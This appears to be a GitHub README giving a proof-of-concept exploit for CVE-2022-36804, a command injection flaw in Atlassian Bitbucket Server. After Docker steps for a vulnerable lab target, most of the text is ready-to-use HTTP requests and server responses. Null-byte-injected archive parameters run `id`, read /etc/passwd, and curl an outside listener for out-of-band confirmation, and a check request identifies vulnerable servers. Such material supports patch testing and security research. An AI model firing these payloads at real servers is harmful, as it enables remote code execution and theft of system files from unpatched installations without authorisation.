/CVE-2022-36804

Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)

MIT LicenseMIT

CVE-2022-36804

Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)

In affected versions of Atlassian Bitbucket Server and Data Center a Command Injection Vulnerability exists in multiple API endpoints where an attacker with access to a public repository or with read permissions to a private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request.

Vulnerable Target Setup

docker pull atlassian/bitbucket-server:7.2.5-ubuntu-jdk11

docker run -v /data/bitbucket:/var/atlassian/application-data/bitbucket --name="bitbucket" -d -p 7990:7990 -p 7999:7999 atlassian/bitbucket-server:7.2.5-ubuntu-jdk11
  • Create new PROJECT named CFX and a repository named lord and make it public, You can use any name for the project and repository.
  • URL to list public repositories Curl http://127.0.0.1:7990/rest/api/latest/repos

POC

REQUEST

GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60id%60%00--prefix=/ HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2

RESPONSE

HTTP/1.1 500 
X-AREQUESTID: @1J1EWV1x490x54736x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: accept-encoding,x-auserid,cookie,x-ausername,accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 04 Oct 2022 08:10:56 GMT
Connection: close
Content-Length: 380

{"errors":[{"context":null,"message":"'/usr/bin/git archive --format=zip --prefix=fusion/\u0000--remote=/\u0000--exec=`id`\u0000--prefix=/ -- 49f16ce1e8ad32a360c9db7a3a84a0b72a12c51f bighax' exited with code 128 saying: `id` '/': 1: uid=2003(bitbucket): not found\nfatal: the remote end hung up unexpectedly","exceptionName":"com.atlassian.bitbucket.scm.CommandFailedException"}]}

Additional Payloads

  • Reading /etc/passwd
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60cat%20/etc/passwd%60%00--prefix=/
  • OOB Test, Replace http://example.com with Burp collab URL or NC listener
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=qualys/%00--remote=/%00--exec=curl%20http://example.com%00--prefix=/

Basic Check to find vulnerable server

REQUEST

GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&prefix=/%00--help%00--%00 HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2

RESPONSE

HTTP/1.1 200 
X-AREQUESTID: @1J1EWV1x506x54738x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: X-AUSERNAME
Vary: X-AUSERID
Vary: Cookie
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="lord-master@49f16ce1e8a.zip"; filename*=UTF-8''lord-master%4049f16ce1e8a.zip
Content-Type: application/octet-stream
Content-Length: 875
Date: Tue, 04 Oct 2022 08:26:21 GMT

usage: git archive [<options>] <tree-ish> [<path>...]
   or: git archive --list
   or: git archive --remote <repo> [--exec <cmd>] [<options>] <tree-ish> [<path>...]
   or: git archive --remote <repo> [--exec <cmd>] --list

    --format <fmt>        archive format
    --prefix <prefix>     prepend prefix to each pathname in the archive
    -o, --output <file>   write the archive to this file
    --worktree-attributes
                          read .gitattributes in working directory
    -v, --verbose         report archived files on stderr
    -0                    store only
    -1                    compress faster
    -9                    compress better

    -l, --list            list supported archive formats

    --remote <repo>       retrieve the archive from remote repository <repo>
    --exec <command>      path to the remote git-upload-archive command